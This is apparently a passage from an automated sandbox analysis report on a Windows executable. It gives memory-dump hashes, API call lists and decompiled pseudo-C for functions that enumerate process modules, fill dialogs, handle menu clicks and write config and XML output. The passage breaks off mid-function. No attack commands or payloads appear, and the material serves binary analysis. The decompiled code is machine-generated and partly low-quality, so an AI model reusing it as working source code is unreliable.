                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                      • API String ID: 393120378-2245444037
                                                                                                                                                      • Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                      • Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
                                                                                                                                                      • Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                      • Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                      • Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                      • Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
                                                                                                                                                      • Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                      • Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                                                      				void* _v0;
                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				unsigned int _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				intOrPtr _t78;
                                                                                                                                                      				void _t89;
                                                                                                                                                      				signed int _t90;
                                                                                                                                                      				int _t98;
                                                                                                                                                      				signed int _t105;
                                                                                                                                                      				signed int _t106;
                                                                                                                                                      				void* _t109;
                                                                                                                                                      
                                                                                                                                                      				_t106 = _t105 & 0xfffffff8;
                                                                                                                                                      				E0040E340(0x8874, __ecx);
                                                                                                                                                      				_t98 = 0;
                                                                                                                                                      				_a8 = 0;
                                                                                                                                                      				if(E0040591F() == 0) {
                                                                                                                                                      					L12:
                                                                                                                                                      					__eflags =  *0x41325c - _t98; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						_t89 = _a4;
                                                                                                                                                      						_t58 =  *0x4128dc(8, _t89);
                                                                                                                                                      						__eflags = _t58 - 0xffffffff;
                                                                                                                                                      						_v8 = _t58;
                                                                                                                                                      						if(_t58 != 0xffffffff) {
                                                                                                                                                      							_v0 = 1;
                                                                                                                                                      							_a560 = 0x428;
                                                                                                                                                      							_t59 =  *0x4128d4(_t58,  &_a560);
                                                                                                                                                      							while(1) {
                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                      								if(_t59 == 0) {
                                                                                                                                                      									goto L18;
                                                                                                                                                      								}
                                                                                                                                                      								memset( &_a8, _t98, 0x21c);
                                                                                                                                                      								_a12 = _a580;
                                                                                                                                                      								_a8 = _t89;
                                                                                                                                                      								wcscpy( &_a16,  &_a1096);
                                                                                                                                                      								_a540 = _a576;
                                                                                                                                                      								_t106 = _t106 + 0x14;
                                                                                                                                                      								_a544 = _a572;
                                                                                                                                                      								_a552 = 0x428;
                                                                                                                                                      								_t69 = E0040CDF8(_a8,  &_a8);
                                                                                                                                                      								__eflags = _t69;
                                                                                                                                                      								if(_t69 != 0) {
                                                                                                                                                      									_t59 =  *0x4128d0(_v16,  &_a552);
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t109 =  *0x413260 - _t98; // 0x0
                                                                                                                                                      					if(_t109 == 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                      						_v0 = _t72;
                                                                                                                                                      						if(_t72 != 0) {
                                                                                                                                                      							_push( &_a4);
                                                                                                                                                      							_push(0x8000);
                                                                                                                                                      							_push( &_a2160);
                                                                                                                                                      							_push(_t72);
                                                                                                                                                      							if( *0x4128e0() != 0) {
                                                                                                                                                      								_t6 =  &_v12;
                                                                                                                                                      								 *_t6 = _v12 >> 2;
                                                                                                                                                      								_v8 = 1;
                                                                                                                                                      								_t90 = 0;
                                                                                                                                                      								if( *_t6 != 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_a1616 = _t98;
                                                                                                                                                      										memset( &_a1618, _t98, 0x208);
                                                                                                                                                      										memset( &_a8, _t98, 0x21c);
                                                                                                                                                      										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                                                      										_t106 = _t106 + 0x18;
                                                                                                                                                      										_a8 = _a4;
                                                                                                                                                      										_a12 = _t78;
                                                                                                                                                      										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
                                                                                                                                                      										E0040CAF2( &_v0,  &_a1600);
                                                                                                                                                      										_push(0xc);
                                                                                                                                                      										_push( &_v20);
                                                                                                                                                      										_push(_v4);
                                                                                                                                                      										_push(_v32);
                                                                                                                                                      										if( *0x4128e4() != 0) {
                                                                                                                                                      											_a508 = _v32;
                                                                                                                                                      											_a512 = _v36;
                                                                                                                                                      										}
                                                                                                                                                      										if(E0040CDF8(_a8,  &_v24) == 0) {
                                                                                                                                                      											goto L18;
                                                                                                                                                      										}
                                                                                                                                                      										_t90 = _t90 + 1;
                                                                                                                                                      										if(_t90 < _v44) {
                                                                                                                                                      											_t98 = 0;
                                                                                                                                                      											__eflags = 0;
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      										}
                                                                                                                                                      										goto L18;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							L18:
                                                                                                                                                      							CloseHandle(_v16);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _a8;
                                                                                                                                                      			}



























                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
                                                                                                                                                      • memset.MSVCRT ref: 0040CC75
                                                                                                                                                      • memset.MSVCRT ref: 0040CC85
                                                                                                                                                        • Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                      • memset.MSVCRT ref: 0040CD70
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CD91
                                                                                                                                                      • CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3300951397-0
                                                                                                                                                      • Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                      • Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
                                                                                                                                                      • Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                      • Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                      				struct HWND__* _t29;
                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                      				struct HWND__* _t61;
                                                                                                                                                      				struct HWND__* _t62;
                                                                                                                                                      				intOrPtr* _t66;
                                                                                                                                                      				void* _t67;
                                                                                                                                                      				intOrPtr* _t68;
                                                                                                                                                      
                                                                                                                                                      				_t58 = __edx;
                                                                                                                                                      				_push(__ebx);
                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                      				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
                                                                                                                                                      				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
                                                                                                                                                      				E00405700(_t61, E00406827(0x2ef), 1);
                                                                                                                                                      				E00405700(_t61, E00406827(0x2f0), 2);
                                                                                                                                                      				SendMessageW(_t61, 0x160, 0x15e, 0);
                                                                                                                                                      				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
                                                                                                                                                      				E00405700(_t62, E00406827(0x2f9), 1);
                                                                                                                                                      				E00405700(_t62, E00406827(0x2fa), 2);
                                                                                                                                                      				E00405700(_t62, E00406827(0x2fb), 3);
                                                                                                                                                      				E00405700(_t62, E00406827(0x2fc), 4);
                                                                                                                                                      				E00405700(_t62, E00406827(0x2fd), 5);
                                                                                                                                                      				SendMessageW(_t62, 0x160, 0x15e, 0);
                                                                                                                                                      				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
                                                                                                                                                      				_t63 = _t29;
                                                                                                                                                      				SendMessageW(_t29, 0x160, 0x15e, 0);
                                                                                                                                                      				E00405700(_t29, E00406827(0x30d), 1);
                                                                                                                                                      				E00405700(_t63, E00406827(0x30e), 2);
                                                                                                                                                      				_t54 = _t66;
                                                                                                                                                      				_pop(_t67);
                                                                                                                                                      				_t68 = _t54;
                                                                                                                                                      				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
                                                                                                                                                      				 *((intOrPtr*)( *_t68 + 0x1c))();
                                                                                                                                                      				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
                                                                                                                                                      				return 0;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      • GetDlgItem.USER32 ref: 00403716
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040375D
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
                                                                                                                                                      • GetDlgItem.USER32 ref: 004037E4
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3030901043-0
                                                                                                                                                      • Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                      • Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
                                                                                                                                                      • Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                      • Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                      			E00401810(void* __ebx) {
                                                                                                                                                      				struct tagRECT _v20;
                                                                                                                                                      				struct tagPAINTSTRUCT _v84;
                                                                                                                                                      
                                                                                                                                                      				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                                                      				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                                                      				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                                                      				asm("movsd");
                                                                                                                                                      				asm("movsd");
                                                                                                                                                      				asm("movsd");
                                                                                                                                                      				asm("movsd");
                                                                                                                                                      				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                                                      				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                      • Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                      • Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
                                                                                                                                                      • Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                      • Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void _v518;
                                                                                                                                                      				signed short _v520;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				int _t46;
                                                                                                                                                      				void* _t64;
                                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                      
                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                      				_t73 = __ecx;
                                                                                                                                                      				_t71 = _a8;
                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                      				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
                                                                                                                                                      					_v520 = _v520 & 0x00000000;
                                                                                                                                                      					memset( &_v518, 0, 0x1fe);
                                                                                                                                                      					E00401000( &_v520, _t67, 0x41203c);
                                                                                                                                                      					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
                                                                                                                                                      					_t71 = _a8;
                                                                                                                                                      				}
                                                                                                                                                      				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
                                                                                                                                                      					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
                                                                                                                                                      					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                      					 *(_t73 + 0x210) = _t46;
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
                                                                                                                                                      					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
                                                                                                                                                      					if( *_t71 == _t46) {
                                                                                                                                                      						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
                                                                                                                                                      						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_a4 != 0x103) {
                                                                                                                                                      					L29:
                                                                                                                                                      					return _t46;
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
                                                                                                                                                      						_t46 = E0040B0C2(_t73);
                                                                                                                                                      						_t71 = _a8;
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
                                                                                                                                                      						_t64 = 0;
                                                                                                                                                      						if(GetKeyState(0x10) < 0) {
                                                                                                                                                      							_t64 = 1;
                                                                                                                                                      						}
                                                                                                                                                      						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
                                                                                                                                                      						_t73 = _v8;
                                                                                                                                                      						_t71 = _a8;
                                                                                                                                                      					}
                                                                                                                                                      					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
                                                                                                                                                      						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
                                                                                                                                                      						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
                                                                                                                                                      							_t46 = E0040824E(_t71, _t68, _t92);
                                                                                                                                                      						}
                                                                                                                                                      						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
                                                                                                                                                      							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                      							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
                                                                                                                                                      							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
                                                                                                                                                      								_t46 = E004081B3(_t71, _t63, 1);
                                                                                                                                                      							}
                                                                                                                                                      							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                      							 *(_t73 + 0x210) = _t46;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t46 = E00402D29(_t71);
                                                                                                                                                      						if(_t46 == 0) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						_t46 = _t73 + 0x280;
                                                                                                                                                      						if( *_t46 != 0) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						 *_t46 = 1;
                                                                                                                                                      						return E00401BDC(_t73, 0x402);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040B698
                                                                                                                                                        • Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8
                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
                                                                                                                                                      • GetMenuStringW.USER32 ref: 0040B71F
                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040B74F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                      • String ID: < A
                                                                                                                                                      • API String ID: 3550944819-1181716546
                                                                                                                                                      • Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                      • Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
                                                                                                                                                      • Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                      • Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                      				void _v526;
                                                                                                                                                      				long _v528;
                                                                                                                                                      				short _v1050;
                                                                                                                                                      				long _v1572;
                                                                                                                                                      				intOrPtr _v1576;
                                                                                                                                                      				char _v1580;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				wchar_t* _t24;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      
                                                                                                                                                      				_t41 = __ecx;
                                                                                                                                                      				_t42 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
                                                                                                                                                      					_v528 = 0;
                                                                                                                                                      					memset( &_v526, 0, 0x208);
                                                                                                                                                      					E00405800( &_v528);
                                                                                                                                                      					_t24 = wcsrchr( &_v528, 0x2e);
                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                      						 *_t24 = 0;
                                                                                                                                                      					}
                                                                                                                                                      					wcscat( &_v528, L".cfg");
                                                                                                                                                      					_v1576 = _a4;
                                                                                                                                                      					_v1580 = 0x410838;
                                                                                                                                                      					_v1572 = 0;
                                                                                                                                                      					_v1050 = 0;
                                                                                                                                                      					wcscpy( &_v1572,  &_v528);
                                                                                                                                                      					E0040D909( &_v1580);
                                                                                                                                                      					_t45 =  &_v1580;
                                                                                                                                                      					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
                                                                                                                                                      					E0040196B(_t42, _t41,  &_v1580);
                                                                                                                                                      					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
                                                                                                                                                      				}
                                                                                                                                                      				return __eax;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040B176
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B190
                                                                                                                                                      • wcscat.MSVCRT ref: 0040B1AC
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040B1E0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcscpywcsrchr
                                                                                                                                                      • String ID: .cfg
                                                                                                                                                      • API String ID: 3959449883-3410578098
                                                                                                                                                      • Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                      • Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
                                                                                                                                                      • Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                      • Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                      			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				signed short _v516;
                                                                                                                                                      				signed short* _t30;
                                                                                                                                                      				signed short* _t34;
                                                                                                                                                      				signed int _t37;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				signed short* _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      
                                                                                                                                                      				_t40 = __edi;
                                                                                                                                                      				_t38 = __ecx;
                                                                                                                                                      				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
                                                                                                                                                      				_t37 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_v516 = _v516 & 0x00000000;
                                                                                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                                                                                      						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                      						_t38 =  *((intOrPtr*)(__edi + 0x6c));
                                                                                                                                                      						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                      						_t44 =  &_v516;
                                                                                                                                                      						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
                                                                                                                                                      						_t34 = _t44;
                                                                                                                                                      						_push(_t34);
                                                                                                                                                      						_push( *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                      						_push(_t34);
                                                                                                                                                      						_push(L"<%s>%s</%s>\r\n");
                                                                                                                                                      						_push(0x2000);
                                                                                                                                                      						_push( *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                      						L0040DFD6();
